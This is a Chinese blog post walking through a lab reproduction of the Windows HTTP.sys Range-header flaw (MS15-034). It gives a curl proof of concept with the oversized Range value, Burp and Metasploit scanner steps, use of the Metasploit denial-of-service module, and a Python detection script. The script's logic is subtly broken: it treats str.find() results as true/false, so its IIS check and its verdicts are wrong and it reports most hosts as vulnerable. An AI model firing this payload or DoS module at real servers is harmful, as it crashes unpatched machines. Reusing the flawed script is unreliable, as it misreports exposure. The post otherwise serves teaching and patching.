CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现

最新推荐文章于 2023-05-25 10:31:13 发布
最新推荐文章于 2023-05-25 10:31:13 发布
阅读量2.9k 收藏 7
点赞数 1
分类专栏: 实战漏洞复现 文章标签: CVE-2015-1635 MS15-034 HTTP.sys远程执行代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/115612774
版权

一、漏洞描述

HTTP协议栈(HTTP.sys)存在远程代码执行漏洞,是由于HTTP.sys不正确的解析HTTP请求引起的,成功利用此漏洞的攻击者可以执行系统账户上任意代码。
攻击者必须发送一个HTTP请求到受影响的系统去触发这个漏洞,通过修改Windows HTTP栈处理请求更新漏洞地址。

主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响。

二、本次复现漏洞环境

靶机:Windows Server 2008
攻击机:Kali

三、漏洞验证

方法一:curl语法验证

(1)查看能否访问目标URL
在这里插入图片描述

(2)使用curl poc验证

curl http://192.168.208.142/iisstart.htm -H "Host: 192.168.208.142" -H "Range: bytes=0-18446744073709551615"

(3)查看结果
如果出现416和Requested Range Not Satisfiable,则证明存在漏洞,反之,则不存在
在这里插入图片描述

方法二:Burpsuite验证

在请求包中添加一行:Range: bytes=0-18446744073709551615
判断方法同上
在这里插入图片描述

方法三:使用MSF验证

(1)kali打开msf:msfconsole
在这里插入图片描述
(2)在msf中搜索利用模块:search MS15-034search CVE-2015-1635
在这里插入图片描述
在这里插入图片描述

(3)选择payload模块,带有sanner的是验证模块,带有dos的是攻击模块:use 1
在这里插入图片描述

(4)设置目标IP:set rhosts xxx.xxx.xxx.xxx
注:端口号如果非80,还要修改端口号
在这里插入图片描述
出现如下所示表示不存在:
在这里插入图片描述

方法四:python poc脚本

(1)脚本代码

import requests
import sys

try:
    print("正在测试http请求,请稍等...")
    url = "http://" + sys.argv[1]
    req = requests.get(url,timeout=5)
    target_server = req.headers['Server']

    if target_server.find("IIS"):
        payload = {"Range": "bytes=0-18446744073709551615"}
        req2 = requests.get(url, headers=payload)
        #print(req2.text)
        #print(req1.request.headers)  # 输出自定义的头部信息

        if str(req2.content).find("Requested Range Not Satisfiable"):
            print("-------------------存在MS15-034漏洞-------------------")
            print("漏洞URL:"+url)

        else:
            print("Waring:不存在MS15-034漏洞")
            print("如有疑问,请手工测试...")
    else:
        print("-------------------服务器不是IIS-------------------")
except:
    try:
        print("http请求失败,正在测试http请求,请稍等...")
        url2 = "https://" + sys.argv[1]
        req = requests.get(url2, timeout=5)
        target_server = req.headers['Server']

        if target_server.find("IIS"):
            payload = {"Range": "bytes=0-18446744073709551615"}
            req2 = requests.get(url2, headers=payload)
            # print(req2.text)
            # print(req1.request.headers)  # 输出自定义的头部信息

            if str(req2.content).find("Requested Range Not Satisfiable"):
                print("-------------------存在MS15-034漏洞-------------------")
                print("漏洞URL:" + url2)

            else:
                print("Waring:不存在MS15-034漏洞")
                print("如有疑问,请手工测试...")
        else:
            print("-------------------服务器不是IIS-------------------")
        print("-------------------目标无法连接-------------------")
    except:
        print("-------------------服务器不是IIS-------------------")

(2)测试
在这里插入图片描述

四、漏洞攻击

选择之前搜索到的dos模块:use 0
在这里插入图片描述
在这里插入图片描述

五、漏洞修复

Microsoft已经为此发布了一个安全公告(MS15-034)以及相应补丁:
MS15-034:Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)
链接:http://technet.microsoft.com/security/bulletin/MS15-034

1stPeak
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635MS15-034
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sysHTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
MS15-034 CVE-2015-1635 HTTP远程代码执行漏洞 (漏洞验证)_ms15-034 cve-2015-1635 http远程代码执行漏洞检测
最新发布
2401_83974087的博客
04-18 649
当存在CVE-2015-1635漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行以及敏感信息泄露。该漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP请求时会导致此漏洞。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。
CVE-2015-1635MS15-034远程代码执行漏洞复现
热门推荐
m0_37638874的博客
06-10 2万+
  1 漏洞背景   2 漏洞影响   3 漏洞利用     3.1 服务器配置与搭建     3.2 测试       3.2.1 curl命令       3.2.2 Host字段       3.2.3 Range字段     3.3 攻击利用   4 防御措施1 漏洞背景2 漏洞影响3 漏洞利用3.1 服务器配置与搭建win7我们如何开启iis服务呢控制面板>程序和功能>打开或关闭windows功能>Internet信息服务>勾选Web管理工具和万维网服务 我们访问一下 如上所示证明开启了iis服
http.sys远程代码执行漏洞(MS15-034
weixin_34307464的博客
08-06 785
0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。 0x0...
网络安全进阶篇(十二章-2)HTTP.SYS远程代码执行漏洞(MS15-034)
划水的小白白
08-31 4281
1.简介 漏洞编号:CVE-2015-1635MS15-034远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 2.影响范围 任何安装了微软IIS 6.0以上的 Win Server 2008 R2、 Win Server 2012、 Win Server 2012 R2、 Win 7、 Win 8、 Win 8.1
CVE-2015-1635:IIS远程代码执行漏洞/HTTP.sys 远程执行代码漏洞(MS15-034)
weixin_38896449的博客
06-01 1161
1、漏洞介绍 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响版本: 安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本 2、漏洞检测 执行curl http://11.
CVE-2015-1635MS15-034Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
MS15-034 HTTP.sys 远程执行代码CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码
MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
11-16
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034 如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这...
Http.sys远程代码执行漏洞(CVE-2015-1635)补丁
04-09
Http.sys远程代码执行漏洞(CVE-2015-1635)补丁,Windows6.1-KB3042553-x64.msu ,适用于Windows Server 2008 R2 x64 ,亲测可用。
MS15-034HTTP.sys 远程执行代码
05-04
在微软4月14日补丁日发布的补丁中,有一个针对IIS服务器的远程代码执行漏洞危害非常大, 漏洞信息 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此...
HTTP.sys远程代码执行(CVE2015-1635)分析复现
加油~
08-16 2444
在这个过程中,如果range指定的数据开始offset小于紧凑的数据包头部的总长度,那么这里在计算最后的发包读取数据时,还会触发一个整数溢出,即0xffffffff(-1,已经被变为32位数)- lower + 1 + header size,如果lower < header size,那么将会导致最后32位整数溢出计算出一个较小的数值,这样导致不会BSOD(如果精确控制响应包大小和文件大小,即使这样还是有可能触发BSOD),告诉服务器,请求资源是哪个范围的内容,让断点续传和并行下载得以实现。...
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034)
SoulCat
06-03 4343
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034) 后来我发现世界真的很大,没有刻意地见面,就真没有再见过了 漏洞概述: HTTP.SYS是从IIS6.0开始,为了更好的在windows上优化IIS服务器性能而引入一个操作系统核心组件。它为IIS及其他需要运用HTTP协议的服务器提供HTTP请求的接收与响应、快速缓存等功能服务。漏洞主要存在于 HTTP 协议堆...
ASP IIS中间件-CVE-2015-1635
尘玥的故事
05-25 343
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码
iis cve-2015-1635复现
时光凉春衫薄的博客
08-07 1万+
今天在一家银行里面护网看到一个cve-2015-1635的告警,打击面挺广的虽然是2015年的漏洞但是打击的面积是server 2008到server2012R2的版本对于现在来说server2012的服务器仍是不少的,今天做个试验记录下这个cve的漏洞。 实验开始: Server2018iis 服务器搭建 看一下iis的ip 搭建成功确认没问题(配置全是默认的) ...
漏洞复现MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞
qq_51950323的博客
11-09 1068
利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响.
HTTP.SYS远程执行代码漏洞分析 (MS15-034
cncold1的博客
08-10 4470
大家肯定用过bugscan老板裤子里面经常出现这个漏洞提示。【xxx存在http.sys远程漏洞】今天我们来分析分析这漏洞如何存在的,据称,利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 ...
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞复现
EC_Carrot的博客
03-08 3944
漏洞背景 在4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响范围 任何安装了微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Serve
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值